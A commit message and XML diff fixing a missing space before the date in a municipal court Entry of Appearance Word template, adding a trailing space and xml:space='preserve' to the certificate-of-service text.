<commit_message>
Fix missing space before date in Entry of Appearance (Muni) template
Certificate of service text had "this{{service_date}}" with no space,
producing "thisFebruary 24, 2026". Added trailing space and xml:space="preserve".

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
</commit_message>
<xml_diff>
--- a/data/templates/Entry_of_Appearance_Muni.docx
+++ b/data/templates/Entry_of_Appearance_Muni.docx
@@ -17,7 +17,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>IN THE MUNICIPAL COURT OF THE CITY OF {{CITY}}</w:t>
+        <w:t xml:space="preserve">IN THE MUNICIPAL COURT OF THE CITY OF {{CITY}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -795,7 +795,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">The below signature certifies a true and accurate copy of the foregoing was given via United States Postal Service to the City of {{city}} Prosecuting Attorney, this</w:t>
+        <w:t xml:space="preserve">The below signature certifies a true and accurate copy of the foregoing was given via United States Postal Service to the City of {{city}} Prosecuting Attorney, this </w:t>
         <w:fldChar w:fldCharType="begin"/>
         <w:instrText xml:space="preserve"> DATE \@ "MMMM d, yyyy" </w:instrText>
         <w:fldChar w:fldCharType="separate"/>

</xml_diff>